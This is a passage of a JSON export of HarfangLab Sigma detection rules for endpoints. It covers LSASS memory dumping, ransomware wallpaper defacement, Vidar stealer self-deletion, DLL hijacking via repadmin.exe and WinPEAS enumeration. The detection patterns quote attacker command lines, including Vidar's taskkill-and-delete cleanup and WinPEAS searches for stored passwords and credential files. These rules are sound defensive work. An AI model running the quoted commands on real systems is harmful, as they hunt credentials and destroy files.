'?:\\Windows\\System32\\Faultrep.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n ProcessCommandLine|contains: ' -u -p '\n\n exclusion_listdlls_signed:\n ProcessOriginalFileName: 'Listdlls.exe'\n ProcessSignature: 'Microsoft Corporation'\n ProcessSigned: 'true'\n\n exclusion_listdlls64_old_sysinternals:\n SourceImage: '*\\Listdlls64.exe'\n GrantedAccess: '0x1fffff'\n ProcessCompany: 'Sysinternals'\n ProcessProduct: 'Sysinternals Listdlls'\n ProcessInternalName: 'Listdlls'\n ProcessOriginalFileName: 'Listdlls.exe'\n\n exclusion_wermgr:\n SourceImage: '*\\wermgr.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n ProcessParentImage: '?:\\Windows\\System32\\WerFault.exe'\n\n exclusion_kaspersky:\n SourceImage:\n - '?:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Endpoint Security for Windows\\avp.exe'\n - '?:\\Program Files (x86)\\Kaspersky Lab\\KES.*\\avp.exe'\n ProcessSigned: 'true'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_qliktech:\n SourceImage: '?:\\Program Files\\Common Files\\QlikTech\\Custom Data\\QvODBCConnectorPackage\\QvOdbcConnectorPackage.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'QlikTech International AB'\n\n exclusion_smartbear:\n ProcessImage: '?:\\Program Files (x86)\\SmartBear\\TestExecute ??\\x64\\Bin\\TestExecute.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'SmartBear Software Inc'\n - 'SmartBear Software Inc.'\n\n exclusion_sqlserver:\n ProcessImage:\n - '?:\\Program Files\\Microsoft SQL Server\\MSSQL??.MSSQLSERVER\\MSSQL\\Binn\\sqlservr.exe'\n - '?:\\Program Files\\Microsoft SQL Server Reporting Services\\SSRS\\ReportServer\\bin\\ReportingServicesService.exe'\n - '?:\\Program Files\\Microsoft SQL Server\\\\*\\DTS\\Binn\\DTExec.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_oracle_dll:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n - 'comsvcs.dll'\n - 'orannzsbb1?.dll'\n\n exclusion_oracle_dll_2:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n - 'comsvcs.dll'\n - 'oraociei1?.dll'\n\n exclusion_oracle_dll_3:\n GrantedAccess: '0x1410'\n CallTrace|contains|all:\n - 'comsvcs.dll'\n - 'OraOLEDB1?.dl'\n\n exclusion_google:\n ProcessImage: '?:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Google LLC'\n CallTrace|contains|all:\n - 'goopdate.dll'\n - 'GoogleUpdate.exe'\n\n exclusion_ninjarmmagent:\n ProcessImage|endswith: '\\NinjaRMMAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'NinjaRMM, LLC'\n - 'NinjaOne LLC'\n CallTrace|contains: 'NinjaRMMAgent.exe'\n\n exclusion_wmi_win32_process_list:\n CallTrace|contains: ':\\Windows\\System32\\framedynos.dll'\n ProcessOriginalFileName: 'Wmiprvse.exe'\n ProcessInternalName: 'Wmiprvse.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n GrantedAccess: '0x1410'\n ProcessParentImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentCommandLine: '?:\\windows\\system32\\svchost.exe -k DcomLaunch -p'\n\n exclusion_mactype:\n ProcessImage: '?:\\program files\\mactype\\mt64agnt.exe'\n\n exclusion_easyvista:\n GrantedAccess: '0x1410'\n ProcessProduct: 'Easyvista'\n ProcessOriginalFileName: 'SMO_MSSQL.exe'\n CallTrace|contains: '\\bin\\orannzsbb.dll+'\n\n exclusion_mcafee:\n ProcessImage:\n - '?:\\Program Files\\McAfee\\Endpoint Security\\Web Control\\mfewc.exe'\n - '?:\\Program Files (x86)\\McAfee\\Endpoint Security\\Web Control\\mfewc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'McAfee, Inc.'\n\n exclusion_rdrleakdiag:\n ProcessImage: '?:\\Windows\\System32\\rdrleakdiag.exe'\n ProcessParentImage: '?:\\Windows\\System32\\taskhostw.exe'\n\n exclusion_setuphost:\n ProcessImage: '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n ProcessParentImage: '?:\\Windows\\SoftwareDistribution\\Download\\\\*\\WindowsUpdateBox.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ab64fdc-5e5d-466b-acb8-d33de7ac703a",
"rule_name": "LSASS Process Memory Dumped via MiniDump API",
"rule_description": "Detects an attempt to open LSASS.exe process memory with read permissions to perform a minidump (using MiniDumpWriteDump located in dbghelp.dll / dbgcore.dll or Minidump located in comsvcs.dll).\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to investigate the process that performed this action to determine its legitimacy, to look for the unwanted usage of stolen credentials on others hosts (e.g via Path-the-Hash) as well as to look for other suspicious actions on the host.\n",
"rule_creation_date": "2021-06-02",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6abfcbb6-635b-4d06-9f3c-96545e9ac929",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622623Z",
"creation_date": "2026-03-23T11:45:34.622625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622629Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.sentinelone.com/blog/venus-ransomware-zeoticus-spin-off-shows-sophistication-isnt-necessary-for-success/",
"https://attack.mitre.org/techniques/T1491/001/"
],
"name": "t1491_001_user_wallpaper_modification.yml",
"content": "title: User's Wallpaper Modified\nid: 6abfcbb6-635b-4d06-9f3c-96545e9ac929\ndescription: |\n Detects a modification of the user's desktop wallpaper via a registry modification.\n This technique is often seen during ransomware deployment. An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the organization.\n Disturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.\n It is recommended to check if this modification is the result of a legitimate action.\nreferences:\n - https://www.sentinelone.com/blog/venus-ransomware-zeoticus-spin-off-shows-sophistication-isnt-necessary-for-success/\n - https://attack.mitre.org/techniques/T1491/001/\ndate: 2024/06/24\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.impact\n - attack.t1491.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: 'SetValue'\n TargetObject: 'HKU\\\\*\\Control Panel\\Desktop\\Wallpaper'\n ProcessImage|startswith: '?:\\'\n ProcessParentImage|startswith: '?:\\'\n\n filter_empty:\n Details:\n - '(Empty)'\n - '(None)'\n - '-'\n\n filter_default:\n Details:\n - '?:\\Windows\\web\\wallpaper\\\\*'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper'\n - '?:\\Users\\\\*\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg'\n - '?:\\Users\\\\*\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\PhotosAppBackground\\\\*'\n - '?:\\Users\\\\*\\AppData\\Local\\Packages\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\LocalCache\\Microsoft\\IrisService\\\\*'\n - '?:\\Windows\\SystemApps\\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\\DesktopSpotlight\\Assets\\Images\\\\*'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_template_gpscript:\n ProcessAncestors|contains: '?:\\Windows\\System32\\gpscript.exe|?:\\Windows\\System32\\svchost.exe'\n\n exclusion_explorer:\n ProcessImage: '?:\\Windows\\Explorer.EXE'\n ProcessParentImage:\n - '?:\\Windows\\system32\\userinit.exe'\n - '?:\\Windows\\System32\\winlogon.exe'\n - '?:\\Windows\\System32\\WerFault.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\Cliaca2kp.exe'\n - '?:\\Program Files\\Microsoft OneDrive\\OneDrive.exe'\n\n exclusion_bginfo1:\n ProcessOriginalFileName:\n - 'BGInfo.exe'\n - 'slui.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Corporation'\n - 'Microsoft Windows'\n\n exclusion_bgingo2:\n Details:\n - '?:\\Windows\\BGInfo.bmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\BGInfo.bmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\?\\BGInfo.bmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\Windows\\Themes\\BGInfo.bmp'\n - '?:\\Users\\\\*\\Local Settings\\Application Data\\Sysinternals\\BGInfo\\BGInfo.bmp'\n\n exclusion_qvi:\n ProcessImage: '?:\\Program Files\\QVI\\Portal\\QPWindowService.exe'\n Details: '?:\\Program Files\\QVI\\Portal\\QVIPortalDesktop.jpg'\n\n exclusion_windowsapps1:\n ProcessImage: '?:\\Program Files\\WindowsApps\\\\*'\n Details: '?:\\Users\\\\*\\AppData\\Local\\Packages\\\\*'\n exclusion_windowsapps2:\n ProcessGrandparentImage: '?:\\Program Files\\WindowsApps\\\\*'\n Details: '?:\\Users\\\\*\\AppData\\Local\\Packages\\\\*'\n\n exclusion_image:\n ProcessImage:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupHost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\mighost.exe'\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe'\n - '?:\\ProgramData\\CentraStage\\AEMAgent\\RMM.WebRemote\\\\*\\RMM.WebRemote.exe'\n - '?:\\Windows\\System32\\Cliaca2kp.exe'\n - '?:\\Windows\\System32\\mspaint.exe'\n\n exclusion_bing:\n ProcessImage: '*\\AppData\\Local\\Microsoft\\BingWallpaperApp\\BingWallpaperApp.exe'\n Details|startswith: '?:\\Users\\\\*\\AppData\\Local\\Microsoft\\BingWallpaperApp\\WPImages\\'\n\n exclusion_backinfo:\n ProcessOriginalFileName: 'BackInfo.exe'\n ProcessProduct: 'Microsoft BackInfo'\n Details:\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\backinfo.bmp'\n - '?:\\Users\\\\*\\AppData\\Local\\Temp\\\\*\\backinfo.bmp'\n\n exclusion_raserver:\n ProcessImage: '?:\\Windows\\System32\\msra.exe'\n ProcessAncestors: '?:\\Windows\\System32\\raserver.exe|?:\\Windows\\System32\\svchost.exe|?:\\Windows\\System32\\services.exe|?:\\Windows\\System32\\wininit.exe'\n\n exclusion_firefox:\n ProcessOriginalFileName: 'firefox.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Mozilla Corporation'\n Details|contains: '\\AppData\\Roaming\\Mozilla\\Firefox\\'\n\n exclusion_osdsetup:\n ProcessImage: '?:\\Windows\\System32\\OSDSETUPHOOK.EXE'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_mighost:\n ProcessOriginalFileName: 'MigHost.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_logmein:\n ProcessOriginalFileName: 'LMI_Rescue.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'LogMeIn, Inc.'\n\n exclusion_transwiz:\n ProcessProduct: 'Transwiz'\n ProcessSigned: 'true'\n ProcessSignature: 'ForensiT Limited'\n\n exclusion_irfanview:\n ProcessOriginalFileName:\n - 'i_view32.exe'\n - 'i_view64.exe'\n Details:\n - '?:\\Users\\\\*\\AppData\\Roaming\\IrfanView\\IrfanView_Wallpaper.bmp'\n - '?:\\Users\\\\*\\AppData\\Roaming\\IrfanView\\IrfanView_Wallpaper.png'\n\n exclusion_dllhost:\n ProcessCommandLine:\n - '?:\\windows\\system32\\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}'\n - '?:\\Windows\\SysWOW64\\DllHost.exe /Processid:{76D0CB12-7604-4048-B83C-1005C7DDC503}'\n Details: '*\\AppData\\Roaming\\Microsoft\\Windows Photo Viewer\\Papier peint de la Visionneuse de photos Windows.jpg'\n\n exclusion_displayfusion:\n ProcessOriginalFileName: 'DisplayFusionSettings.dll'\n ProcessSigned: 'true'\n ProcessSignature: 'Binary Fortress Software Ltd'\n\n exclusion_msra:\n ProcessCommandLine: '?:\\Windows\\System32\\msra.exe -CreateRAConnectionString'\n ProcessParentImage: '?:\\Windows\\System32\\raserver.exe'\n\n exclusion_bingsnap:\n ProcessOriginalFileName: 'BingSnap.exe'\n ProcessCompany: 'Carthago Software'\n\n exclusion_bingdesktop:\n ProcessOriginalFileName: 'BingDesktop.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_ec2:\n ProcessCommandLine: '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoProfile -NonInteractive -NoLogo -WindowStyle hidden -ExecutionPolicy Unrestricted Import-Module ?:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\Ec2Launch.psd1; Set-Wallpaper'\n Details: '*\\AppData\\Local\\Ec2Wallpaper_Info.jpg'\n\n exclusion_intune:\n ProcessParentImage: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\AgentExecutor.exe'\n\n exclusion_wallpaperchangescheduler:\n ProcessOriginalFileName: 'WallpaperChangeScheduler.exe'\n ProcessCompany: 'FutureSight Technologies'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: low\n# level: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6abfcbb6-635b-4d06-9f3c-96545e9ac929",
"rule_name": "User's Wallpaper Modified",
"rule_description": "Detects a modification of the user's desktop wallpaper via a registry modification.\nThis technique is often seen during ransomware deployment. An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users, thus discrediting the organization.\nDisturbing or offensive images may be used as a part of Internal Defacement in order to cause user discomfort, or to pressure compliance with accompanying messages.\nIt is recommended to check if this modification is the result of a legitimate action.\n",
"rule_creation_date": "2024-06-24",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.impact"
],
"rule_technique_tags": [
"attack.t1491.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6ac8ae28-b9f5-4dd1-897f-8aacbdde35c6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611003Z",
"creation_date": "2026-03-23T11:45:34.611006Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.611014Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/",
"https://blog.cyble.com/2021/10/26/vidar-stealer-under-the-lens-a-deep-dive-analysis/",
"https://attack.mitre.org/techniques/T1587/001/",
"https://attack.mitre.org/techniques/T1539/",
"https://attack.mitre.org/techniques/T1087/",
"https://attack.mitre.org/techniques/T1095/"
],
"name": "t1587_001_vidar_trojan_usage.yml",
"content": "title: Possible Vidar Stealer Command-line Execution\nid: 6ac8ae28-b9f5-4dd1-897f-8aacbdde35c6\ndescription: |\n Detects suspicious command-lines usually associated with the Vidar Stealer self-deleting.\n Vidar is a forked malware based on Arkei and is designed to steal credentials from victims' devices, including but not limited to banking information, crypto wallets and browser credentials.\n It is recommended to analyze the process responsible for the execution of this command-line and to analyze all child processes stemming from cmd.exe.\nreferences:\n - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/\n - https://blog.cyble.com/2021/10/26/vidar-stealer-under-the-lens-a-deep-dive-analysis/\n - https://attack.mitre.org/techniques/T1587/001/\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1087/\n - https://attack.mitre.org/techniques/T1095/\ndate: 2022/10/20\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1587.001\n - attack.t1539\n - attack.t1087\n - attack.t1095\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Stealer.Vidar\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Deletion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains:\n - '/c taskkill /im *.exe /f & timeout /t 6 & del /f /q *.exe & del ?:\\PrograData\\\\*.dll & exit' # There really is a typo\n - '/c taskkill /im *.exe /f & timeout /t 6 & del /f /q \"*.exe\" & del ?:\\ProgramData\\\\*.dll & exit'\n - '/c taskkill /im *.exe /f & erase *.exe & exit'\n\n condition: selection\nlevel: high\n# level: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6ac8ae28-b9f5-4dd1-897f-8aacbdde35c6",
"rule_name": "Possible Vidar Stealer Command-line Execution",
"rule_description": "Detects suspicious command-lines usually associated with the Vidar Stealer self-deleting.\nVidar is a forked malware based on Arkei and is designed to steal credentials from victims' devices, including but not limited to banking information, crypto wallets and browser credentials.\nIt is recommended to analyze the process responsible for the execution of this command-line and to analyze all child processes stemming from cmd.exe.\n",
"rule_creation_date": "2022-10-20",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1087",
"attack.t1095",
"attack.t1539",
"attack.t1587.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6add9385-b6ca-466e-bd6a-b299f4efd32f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.589388Z",
"creation_date": "2026-03-23T11:45:34.589391Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.589399Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://wietze.github.io/blog/save-the-environment-variables",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_repadmin.yml",
"content": "title: DLL Hijacking via repadmin.exe\nid: 6add9385-b6ca-466e-bd6a-b299f4efd32f\ndescription: |\n Detects potential Windows DLL Hijacking via repadmin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'repadmin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\certcli.dll'\n - '\\dnsapi.dll'\n - '\\dsrole.dll'\n - '\\logoncli.dll'\n - '\\mpr.dll'\n - '\\netutils.dll'\n - '\\ntdsapi.dll'\n - '\\secur32.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6add9385-b6ca-466e-bd6a-b299f4efd32f",
"rule_name": "DLL Hijacking via repadmin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via repadmin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b267200-d21d-471d-8ebe-6571ed2f02fb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606576Z",
"creation_date": "2026-03-23T11:45:34.606579Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606586Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS",
"https://attack.mitre.org/techniques/T1082/",
"https://attack.mitre.org/techniques/T1592/",
"https://attack.mitre.org/tactics/TA0004/"
],
"name": "t1082_winpeas_cmds.yml",
"content": "title: WinPEAS HackTool Enumeration Batch Job Executed\nid: 6b267200-d21d-471d-8ebe-6571ed2f02fb\ndescription: |\n Detects specific WinPEAS (Windows Privilege Escalation Awesome Scripts) commands.\n WinPEAS is a tool used in post-exploitation phases to automatically discover privilege escalation vectors through misconfigurations, vulnerable services, and sensitive credential files.\n It is recommended to check if the usage of WinPEAS is legitimate as well as to investigate the user context and look for subsequent privilege escalation attempts.\nreferences:\n - https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS\n - https://attack.mitre.org/techniques/T1082/\n - https://attack.mitre.org/techniques/T1592/\n - https://attack.mitre.org/tactics/TA0004/\ndate: 2022/10/19\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1082\n - attack.reconnaissance\n - attack.t1592.001\n - attack.t1592.002\n - attack.t1592.004\n - attack.privilege_escalation\n - attack.defense_evasion\n - attack.t1222.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.HackTool.WinPEAS\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n info_printing:\n Image|endswith: '\\cmd.exe'\n ParentImage|endswith: '\\forfiles.exe'\n CommandLine|contains:\n - 'UNQUOTED SERVICE PATHS'\n - 'SERVICE BINARY PERMISSIONS WITH WMIC and ICACLS'\n - 'DLL HIJACKING in PATHenv variable'\n - 'CHECK IF YOU CAN MODIFY ANY SERVICE REGISTRY'\n\n enumerating_winlogon:\n Image|endswith: '\\findstr.exe'\n CommandLine|contains: 'findstr ?i DefaultDomainName DefaultUserName DefaultPassword AltDefaultDomainName AltDefaultUserName AltDefaultPassword LastUsedUsername'\n\n enumerating_run_startup:\n Image|endswith: '\\findstr.exe'\n CommandLine|contains: 'findstr ?v ?i \"disable deshab informa\")'\n\n enumerating_credentials:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains: 'RDCMan.settings == *.rdg == SCClient.exe == *_history == .sudo_as_admin_successful == .profile == *bashrc == httpd.conf == *.plan == .htpasswd == .git-credentials == *.rhosts == hosts.equiv == Dockerfile == docker-compose.yml == appcmd.exe == TypedURLs == TypedURLsTime == History == Bookmarks == Cookies'\n\n enumerating_antivirus:\n Image|endswith: '\\WMIC.exe'\n CommandLine|contains: 'WMIC ?Node:localhost ?Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayName ?Format:List'\n\n enumerating_winrm:\n Image|endswith: '\\cmd.exe'\n CommandLine|contains: '?c sc qc WinRM | findstr BINARY_PATH_NAME | findstr ?i ?v ?l ?c:?:\\windows\\system32 | findstr ?v /c:'\n\n condition: 1 of enumerating_* or info_printing\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6b267200-d21d-471d-8ebe-6571ed2f02fb",
"rule_name": "WinPEAS HackTool Enumeration Batch Job Executed",
"rule_description": "Detects specific WinPEAS (Windows Privilege Escalation Awesome Scripts) commands.\nWinPEAS is a tool used in post-exploitation phases to automatically discover privilege escalation vectors through misconfigurations, vulnerable services, and sensitive credential files.\nIt is recommended to check if the usage of WinPEAS is legitimate as well as to investigate the user context and look for subsequent privilege escalation attempts.\n",
"rule_creation_date": "2022-10-19",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.discovery",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1082",
"attack.t1222.001",
"attack.t1592.001",
"attack.t1592.002",
"attack.t1592.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6b391800-cce0-4884-8edc-4be9d0b7daae",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
